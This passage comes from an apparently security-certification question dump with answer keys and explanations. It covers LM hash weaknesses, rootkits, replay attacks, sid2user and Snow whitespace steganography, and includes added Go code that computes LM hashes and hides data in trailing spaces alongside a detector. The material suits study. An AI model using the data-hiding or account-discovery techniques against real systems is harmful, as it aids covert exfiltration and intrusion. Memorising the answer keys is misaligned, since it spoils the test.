But he still receives hundreds of thousands of brute-force attempts generated from various IP addresses around the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to use a different random proxy on each request so as not to get caught by the firewall.
Later he adds another rule to his firewall and enables a small sleep on each password attempt, so that if the password is incorrect it takes 45 seconds before the user can begin another attempt. Since an intruder may use multiple machines to brute-force the password, he also throttles the number of connections that will be accepted from a particular IP address. This action will slow the intruder's attempts. Samuel wants to completely block hackers' brute-force attempts on his network.
What are the alternatives to defending against possible brute-force password attacks on his site?
A. Enforce a password policy and use account lockouts after three wrong logon attempts even though this might lock out legit users
B. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the firewall manually
C. Enforce complex password policy on your network so that passwords are more difficult to brute force
D. You can't completely block the intruders' attempts if they constantly switch proxies
Answer: D
Explanation: Without knowing where the next attack will come from, there is no way to proactively block it. This is becoming an increasing problem with the growth of large botnets using ordinary workstations and home computers in large numbers.
QUESTION 498:
LAN Manager passwords are concatenated to 14 bytes and split in half. The two halves are hashed individually. If the password is 7 characters or less, then the second half of the hash is always:
A. 0xAAD3B435B51404EE
B. 0xAAD3B435B51404AA
C. 0xAAD3B435B51404BB
D. 0xAAD3B435B51404CC
Answer: A
Explanation: A problem with LM stems from the total lack of salting or cipher block chaining in the hashing process. To hash a password, the first 7 bytes of it are transformed into an 8-byte odd-parity DES key. This key is used to encrypt the 8-byte string "KGS!@". The same thing happens with the second part of the password.
This lack of salting creates two interesting consequences. Obviously it means the password is always stored in the same way, which just begs for a typical lookup table attack. The other consequence is that it is easy to tell whether a password is bigger than 7 bytes in size. If not, the last 7 bytes will all be null and will result in a constant DES hash of 0xAAD3B435B51404EE.
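An added worked example, not from the original page, that computes an LM hash with Go's standard crypto/des and applies the length check the explanation describes; it uses the full 8-byte constant "KGS!@#$%", of which the page's text shows only the first characters.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// lmConstant is the fixed 8-byte plaintext that LM encrypts under each
// 7-byte half of the password used as a DES key.
const lmConstant = "KGS!@#$%"

// emptyHalf is DES(lmConstant) under an all-null half: the constant that
// appears as the second half whenever the password has at most 7 characters.
const emptyHalf = "aad3b435b51404ee"

// desKeyFrom7 spreads 56 bits of password material across 8 key bytes, leaving
// the low bit of each byte for DES parity (crypto/des ignores those bits).
func desKeyFrom7(b []byte) []byte {
	k := []byte{
		b[0] >> 1,
		(b[0]&0x01)<<6 | b[1]>>2,
		(b[1]&0x03)<<5 | b[2]>>3,
		(b[2]&0x07)<<4 | b[3]>>4,
		(b[3]&0x0f)<<3 | b[4]>>5,
		(b[4]&0x1f)<<2 | b[5]>>6,
		(b[5]&0x3f)<<1 | b[6]>>7,
		b[6] & 0x7f,
	}
	for i := range k {
		k[i] <<= 1 // move the 7 data bits up; bit 0 is the parity position
	}
	return k
}

// lmHalf returns DES_key(lmConstant) for one 7-byte half of the padded password.
func lmHalf(half []byte) []byte {
	block, err := des.NewCipher(desKeyFrom7(half))
	if err != nil {
		panic(err) // the key is always exactly 8 bytes, so this cannot fail
	}
	out := make([]byte, 8)
	block.Encrypt(out, []byte(lmConstant))
	return out
}

// LMHash computes the 16-byte LAN Manager hash as lowercase hex: uppercase the
// password, pad with nulls (or truncate) to 14 bytes, then hash each 7-byte
// half on its own. No salt is involved, so equal passwords give equal hashes.
func LMHash(password string) string {
	p := []byte(strings.ToUpper(password))
	if len(p) > 14 {
		p = p[:14]
	}
	p = append(p, make([]byte, 14-len(p))...)
	return hex.EncodeToString(append(lmHalf(p[:7]), lmHalf(p[7:])...))
}

// IsSevenOrFewer is the audit check from the explanation: an LM hash whose
// second half equals emptyHalf belongs to a password of 7 characters or fewer.
func IsSevenOrFewer(lmHex string) bool {
	return len(lmHex) == 32 && strings.ToLower(lmHex[16:]) == emptyHalf
}

func main() {
	for _, pw := range []string{"", "pass", "password"} {
		h := LMHash(pw)
		fmt.Printf("%-12q %s  <=7 chars: %v\n", pw, h, IsSevenOrFewer(h))
	}
}
```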
QUESTION 499:
Travis works primarily from home as a medical transcriptionist.
He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM.
He uses voice recognition software, which is processor intensive, which is why he bought the new computer. Travis frequently has to get on the Internet to do research on what he is working on. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to.
Travis uses antivirus software, anti-spyware software and always keeps the computer up-to-date with Microsoft patches.
After another month of working on the computer, Travis's computer is even more noticeably slow. Every once in a while, Travis also notices a window or two pop up on his screen, but they quickly disappear. He has seen these windows show up even when he has not been on the Internet. Travis is really worried about his computer because he spent a lot of money on it and he depends on it for work. Travis goes through Windows Explorer and checks the file system, folder by folder, to see if there is anything he can find. He spends over four hours poring over the files and folders and can't find anything, but before he gives up he notices that his computer only has about 10 GB of free space available. Since his drive is a 200 GB hard drive,
Travis thinks this is very odd.
Travis downloads Space Monger and adds up the sizes of all the folders and files on his computer. According to his calculations, he should have around 150 GB of free space. What is most likely the cause of Travis's problems?
A. Travis's Computer is infected with stealth kernel level rootkit
B. Travis's Computer is infected with Stealth Trojan Virus
C. Travis's Computer is infected with Self-Replication Worm that fills the hard disk space
D. Logic Bombs triggered at random times creating hidden data consuming junk files
Answer: A
Explanation: A rootkit can take full control of a system. A rootkit's only purpose is to hide files, network connections, memory addresses, or registry entries from other programs used by system administrators to detect intended or unintended special privilege accesses to the computer resources.
QUESTION 500:
Which of the following is an attack in which a secret value like a hash is captured and then reused at a later time to gain access to a system without ever decrypting or decoding the hash?
A. Replay Attacks
B. Brute Force Attacks
C. Cryptography Attacks
D. John the Ripper Attacks
Answer: A
Explanation: A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it.
QUESTION 501:
You are the IT Manager of a large legal firm in California. Your firm represents many important clients whose names always must remain anonymous to the public.
Your boss, Mr. Smith, is always concerned about client information being leaked or revealed to the press or public. You have just finished a complete security overhaul of your information system including an updated IPS, a new firewall, email encryption and employee security awareness training. Unfortunately, many of your firm's clients do not trust technology to completely secure their information, so couriers routinely have to travel back and forth to and from the office with sensitive information. Your boss has charged you with figuring out how to secure the information the couriers must transport. You propose that the data be transferred using burned CDs or USB flash drives. You initially think of encrypting the files, but decide against that method for fear the encryption keys could eventually be broken.
What software application could you use to hide the data on the CDs and USB flash drives?
A. Snow
B. File Snuff
C. File Sneaker
D. EFS
Answer: A
Explanation: The Snow software developed by Matthew Kwan will insert extra spaces at the end of each line. Three bits are encoded in each line by adding between 0 and 7 spaces that are ignored by most display programs including web browsers.
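A simplified version of the trailing-space scheme the explanation describes (three bits per line as 0 to 7 spaces), written here as an added example rather than the snow program's own code, together with a decoder and the trailing-whitespace count a reviewer can use to spot such files; the one-byte length prefix and the cover text are my own assumptions.

```go
package main

import (
	"fmt"
	"strings"
)

const bitsPerLine = 3 // 0-7 trailing spaces carry three bits, as on the page

func trailingSpaces(line string) int {
	return len(line) - len(strings.TrimRight(line, " "))
}

// Hide appends 0-7 spaces to successive lines of cover so each line carries
// three bits of (length byte + data), most significant bit first. Existing
// trailing whitespace is stripped so the decoder only sees ours.
func Hide(cover string, data []byte) (string, error) {
	if len(data) > 255 {
		return "", fmt.Errorf("%d bytes exceeds the one-byte length prefix", len(data))
	}
	lines := strings.Split(cover, "\n")
	for i := range lines {
		lines[i] = strings.TrimRight(lines[i], " \t")
	}
	var bits []byte
	for _, b := range append([]byte{byte(len(data))}, data...) {
		for i := 7; i >= 0; i-- {
			bits = append(bits, (b>>uint(i))&1)
		}
	}
	for len(bits)%bitsPerLine != 0 {
		bits = append(bits, 0) // pad the last line to a full 3-bit group
	}
	if need := len(bits) / bitsPerLine; need > len(lines) {
		return "", fmt.Errorf("need %d lines, cover has %d", need, len(lines))
	}
	for i := 0; i < len(bits); i += bitsPerLine {
		v := bits[i]<<2 | bits[i+1]<<1 | bits[i+2]
		lines[i/bitsPerLine] += strings.Repeat(" ", int(v))
	}
	return strings.Join(lines, "\n"), nil
}

// Reveal reads three bits from every line, reassembles bytes and returns the
// data announced by the length prefix.
func Reveal(text string) ([]byte, error) {
	var bits []byte
	for n, line := range strings.Split(text, "\n") {
		v := trailingSpaces(line)
		if v > 7 {
			return nil, fmt.Errorf("line %d has %d trailing spaces, not a 3-bit value", n+1, v)
		}
		bits = append(bits, byte(v>>2)&1, byte(v>>1)&1, byte(v)&1)
	}
	var out []byte
	for i := 0; i+8 <= len(bits); i += 8 {
		var b byte
		for _, bit := range bits[i : i+8] {
			b = b<<1 | bit
		}
		out = append(out, b)
	}
	if len(out) == 0 || int(out[0]) > len(out)-1 {
		return nil, fmt.Errorf("no complete hidden message")
	}
	return out[1 : 1+int(out[0])], nil
}

// Suspicious is the defender's check: ordinary text has few lines ending in
// spaces, so many of them (and the bit capacity they represent) merit a look.
func Suspicious(text string) (lines, capacityBits int) {
	for _, line := range strings.Split(text, "\n") {
		if trailingSpaces(line) > 0 {
			lines++
			capacityBits += bitsPerLine
		}
	}
	return lines, capacityBits
}

func main() {
	// Constructed cover text: 16 short lines with nothing hidden yet.
	cover := strings.Repeat("The quick brown fox jumps over the lazy dog.\n", 15) + "End."
	stego, err := Hide(cover, []byte("pass"))
	if err != nil {
		panic(err)
	}
	got, _ := Reveal(stego)
	n, bits := Suspicious(stego)
	fmt.Printf("hidden %q; %d lines end in spaces (%d bits of capacity)\n", got, n, bits)
}
```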
QUESTION 502:
You are the security administrator for a large online auction company based out of Los Angeles. After getting your ENSA certification last year, you have steadily been fortifying your network's security, including training, OS hardening and network security. One of the last things you changed for security reasons was to rename all the built-in administrator accounts on the local PCs and in Active Directory. After thorough testing you found that no services or programs were affected by the name changes.
Your company undergoes an outside security audit by a consulting company and they say that even though all the administrator account names were changed, the accounts could still be used by a clever hacker to gain unauthorized access. You argue with the auditors and say that is not possible, so they use a tool and show you how easy it is to utilize the administrator account even though its name was changed. What tool did the auditors use?
A. sid2user
B. User2sid
C. GetAcct
D. Fingerprint
Answer: A
Explanation: User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) on the local or a remote machine. Sid2user.exe can then be used to retrieve the names of all the user accounts and more.
QUESTION 503:
John Beetlesman, the hacker, has successfully compromised the Linux system of Agent Telecommunications, Inc.'s web server running Apache. He has downloaded sensitive documents and database files off the machine.
Upon performing various tasks, Beetlesman finally runs the following command on the Linux box before disconnecting.
for((i=0;i
